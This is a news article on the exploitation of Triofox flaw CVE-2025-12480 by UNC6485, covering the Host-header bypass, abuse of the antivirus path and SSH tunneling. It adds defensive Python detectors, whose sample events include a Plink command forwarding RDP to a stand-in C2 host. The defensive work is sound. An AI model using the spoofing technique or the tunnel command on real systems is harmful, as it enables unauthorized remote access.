CVE-2025-12480 exploitation chain | Image: Mandiant Threat Defense
Researchers at Mandiant Threat Defense, part of Google Cloud Security Operations, have revealed that a critical unauthenticated access vulnerability in Gladinet’s Triofox file-sharing platform has been actively exploited in the wild by a threat actor tracked as UNC6485. The vulnerability, now patched as CVE-2025-12480, allowed attackers to bypass authentication, create administrative accounts, and achieve SYSTEM-level code execution through a chained attack path.
The exploitation campaign was first detected on August 24, 2025, when Google Threat Intelligence Group (GTIG) observed UNC6485 leveraging the Triofox flaw in combination with abuse of the product’s built-in antivirus feature.
“As early as Aug. 24, 2025, a threat cluster tracked by Google Threat Intelligence Group (GTIG) as UNC6485 exploited the unauthenticated access vulnerability and chained it with the abuse of the built-in anti-virus feature to achieve code execution,” Mandiant wrote.
The attackers specifically targeted Triofox version 16.4.10317.56372, which was vulnerable until the issue was mitigated in version 16.7.10368.56560.
Mandiant confirmed that Gladinet has released a fix and “validated that this vulnerability is resolved in new versions of Triofox.”
Mandiant’s Google Security Operations (SecOps) platform detected anomalous activity indicating potential exploitation of Triofox servers. Analysts identified remote access utility deployment, RDP tunneling, and suspicious file activity in system directories such as C:\Windows\Temp.
“Within 16 minutes of beginning the investigation, Mandiant confirmed the threat and initiated containment of the host,” the report said.
During the investigation, analysts found that UNC6485 had exploited the flaw to gain access to the AdminDatabase.aspx configuration page — normally accessible only during initial software setup. From there, the attackers created a new administrative account called Cluster Admin to perform post-exploitation activities.
The root cause of CVE-2025-12480 was an insecure implementation of access control checks within the Triofox web interface. Mandiant found that access to critical configuration pages could be granted simply by spoofing the HTTP Host header to “localhost”, tricking the application into assuming the request was local.
“Changing the Host value to localhost grants access to the AdminDatabase.aspx page,” Mandiant explained, confirming that this bypassed all authentication checks.
Code analysis revealed that the function controlling access, CanRunCriticalPage(), failed to validate request origins and relied solely on the value of Request.Url.Host.
“The code presents several vulnerabilities,” Mandiant wrote. “Host Header attack – ASP.NET builds Request.Url from the HTTP Host header, which can be modified by an attacker. No Origin Validation – No check for whether the request came from an actual localhost connection versus a spoofed header.”
This design flaw effectively allowed unauthenticated attackers to run the setup process remotely, bypassing security controls that normally restrict these pages to local installations.
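The two halves of the root cause above, the header-only locality test and the peer-address test that should replace it, are easy to show side by side. The following Python is an added example written for this article, not Gladinet code and not Mandiant's: `host_header_says_local()` mirrors the weak pattern the report attributes to `CanRunCriticalPage()` (trusting `Request.Url.Host`), `peer_is_loopback()` is the hardened alternative based on the TCP peer address, and `find_host_spoofing()` runs the same distinction over a constructed IIS W3C log excerpt to surface requests for `AdminDatabase.aspx` that claim to be local but arrive from a routable address. The log lines, IP addresses and host names are constructed, and the `cs-host` column is assumed to be enabled in IIS logging (it is optional by default).

```python
import ipaddress

# The weak check: locality decided from the client-controlled Host header.
# In ASP.NET, Request.Url.Host is populated from that header, so any client
# can satisfy this test by sending "Host: localhost".
def host_header_says_local(host_header: str) -> bool:
    name = host_header.strip().lower().split(":")[0]   # drop an explicit port
    return name in {"localhost", "127.0.0.1"}

# The hardened check: locality decided from the transport-level peer address
# (Request.UserHostAddress in classic ASP.NET, HttpContext.Connection.RemoteIpAddress
# in ASP.NET Core), which a remote client cannot forge the way it forges a header.
def peer_is_loopback(remote_addr: str) -> bool:
    try:
        return ipaddress.ip_address(remote_addr).is_loopback
    except ValueError:
        return False

# A gate for setup-only pages that ignores the Host header entirely and also
# refuses the page once first-run setup has completed. Hypothetical function,
# not the product's own; the setup_completed flag is assumed to exist.
def can_run_critical_page(host_header: str, remote_addr: str, setup_completed: bool) -> bool:
    del host_header                      # deliberately unused: never an input to this decision
    return peer_is_loopback(remote_addr) and not setup_completed

# Constructed IIS W3C log excerpt (not from the report). 203.0.113.7 and
# 198.51.100.20 are documentation addresses standing in for external clients.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-host sc-status
2025-08-24 09:58:11 127.0.0.1 GET /AdminDatabase.aspx localhost 200
2025-08-24 10:01:33 198.51.100.20 GET /portal/login.aspx triofox.example.com 200
2025-08-24 10:15:02 203.0.113.7 GET /AdminDatabase.aspx localhost 200
2025-08-24 10:15:40 203.0.113.7 POST /AdminDatabase.aspx localhost 302
"""

CRITICAL_PAGES = {"/admindatabase.aspx"}   # setup-only pages worth alerting on

def find_host_spoofing(lines):
    """Return (timestamp, client_ip, method, host_header) for every request to a
    critical page whose Host header claims localhost but whose peer is not loopback."""
    fields, hits = None, []
    for line in lines:
        if line.startswith("#Fields:"):
            fields = line.split()[1:]        # column names come from the W3C header
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        rec = dict(zip(fields, line.split()))
        if rec.get("cs-uri-stem", "").lower() not in CRITICAL_PAGES:
            continue
        if host_header_says_local(rec.get("cs-host", "-")) and not peer_is_loopback(rec["c-ip"]):
            hits.append((rec["date"] + " " + rec["time"], rec["c-ip"], rec["cs-method"], rec["cs-host"]))
    return hits

if __name__ == "__main__":
    for hit in find_host_spoofing(SAMPLE_LOG.splitlines()):
        print("possible Host-header spoofing:", hit)
```

On the constructed log the detector flags only the two requests from 203.0.113.7; the genuine loopback request at 09:58 passes. Note the caveat for the hardened check: behind a reverse proxy that terminates TLS on the same machine, every request arrives from a loopback peer, so the peer-address test alone is not enough there and the setup pages should be disabled outright once installation is complete.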
Once inside, the attackers used their newly created admin account to exploit Triofox’s antivirus configuration feature — a legitimate functionality that allows administrators to define a custom antivirus engine path.
By configuring this path to point to a malicious batch script, the attackers achieved code execution as SYSTEM, the highest level of privilege on Windows systems.
This abuse allowed the adversary to execute arbitrary commands and drop additional payloads directly onto the compromised server.
Mandiant observed the threat actor executing a PowerShell command via their malicious batch file to download and execute a second-stage payload masquerading as a legitimate software installer:
The payload was a legitimate Zoho Unified Endpoint Management System (UEMS) installer that the attackers used to deploy Zoho Assist and AnyDesk remote access tools on the victim machine.
After establishing remote access, the attackers used PuTTY and Plink to create an SSH tunnel that redirected RDP traffic through encrypted channels on port 433.
Mandiant noted that this technique enabled covert persistence and bypassed network perimeter controls.
“These tools were used to set up an encrypted tunnel, connecting the compromised host to their command-and-control (C2) server over port 433 via SSH. The C2 server could then forward all traffic… allowing inbound RDP traffic,” the report said.
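The tunneling stage described above leaves a distinctive process-creation footprint: an SSH client launched with a port-forwarding flag that carries RDP, talking to a non-standard SSH port, often from a writable directory and under the SYSTEM account inherited from the batch file. The following Python is an added example written for this article (not Mandiant's detection content) that scores Sysmon-style process-creation events for that combination. The events, binary paths, user names and the `c2.example` host are constructed; the `-R`, `-L` and `-P` options are real Plink flags, and the 433 and 3389 port numbers come from the report.

```python
import re
from dataclasses import dataclass, field

RDP_PORT = 3389
SSH_CLIENTS = {"plink.exe", "putty.exe"}
WRITABLE_DIRS = (r"c:\windows\temp", r"c:\users\public", r"c:\programdata")

FORWARD_FLAG = re.compile(r"(?:^|\s)-([RL])\s+(\S+)")   # Plink -R / -L <forward spec>
PORT_FLAG = re.compile(r"(?:^|\s)-P\s+(\d+)")             # Plink -P <ssh port>

# Constructed Sysmon-style (Event ID 1) records, not events from the incident.
# Only the first one reproduces the pattern the report describes.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\Temp\plink.exe",
     "CommandLine": r"C:\Windows\Temp\plink.exe -ssh -P 433 -R 3389:127.0.0.1:3389 -batch tunnel@c2.example",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "User": r"NT AUTHORITY\SYSTEM"},
    {"Image": r"C:\Program Files\PuTTY\plink.exe",          # benign admin use, no forwarding
     "CommandLine": r'"C:\Program Files\PuTTY\plink.exe" -ssh admin@jump.corp.example',
     "ParentImage": r"C:\Windows\explorer.exe",
     "User": r"CORP\jdoe"},
    {"Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs",
     "ParentImage": r"C:\Windows\System32\services.exe",
     "User": r"NT AUTHORITY\SYSTEM"},
]

@dataclass
class Finding:
    image: str
    user: str
    reasons: list = field(default_factory=list)

def _ports_in_spec(spec: str) -> set:
    """'3389:127.0.0.1:3389' -> {3389}; non-numeric segments are host names."""
    return {int(p) for p in spec.split(":") if p.isdigit()}

def analyze_event(ev: dict):
    """Return a Finding for an SSH client started with port forwarding, else None."""
    image = ev.get("Image", "")
    if image.lower().rsplit("\\", 1)[-1] not in SSH_CLIENTS:
        return None
    cmd = ev.get("CommandLine", "")
    forwards = FORWARD_FLAG.findall(cmd)
    if not forwards:
        return None                      # interactive SSH without forwarding is out of scope
    f = Finding(image=image, user=ev.get("User", ""))
    for direction, spec in forwards:
        if RDP_PORT in _ports_in_spec(spec):
            kind = "remote" if direction == "R" else "local"
            f.reasons.append(f"{kind} forward carries RDP ({RDP_PORT})")
    m = PORT_FLAG.search(cmd)
    if m and int(m.group(1)) != 22:
        f.reasons.append(f"ssh on non-standard port {m.group(1)}")
    if f.user.upper().endswith("\\SYSTEM"):
        f.reasons.append("runs as SYSTEM")
    if image.lower().startswith(WRITABLE_DIRS):
        f.reasons.append("binary launched from world-writable directory")
    return f

def scan_events(events):
    return [f for f in (analyze_event(e) for e in events) if f is not None]

if __name__ == "__main__":
    for finding in scan_events(SAMPLE_EVENTS):
        print(finding.image, finding.user, "->", "; ".join(finding.reasons))
```

Matching on the image name alone is weak, since the binary can be renamed; in production the Sysmon `OriginalFileName` field or a file hash is the better anchor, and the egress side of the same activity (a long-lived outbound connection to port 433 from a file server) gives a second, independent signal.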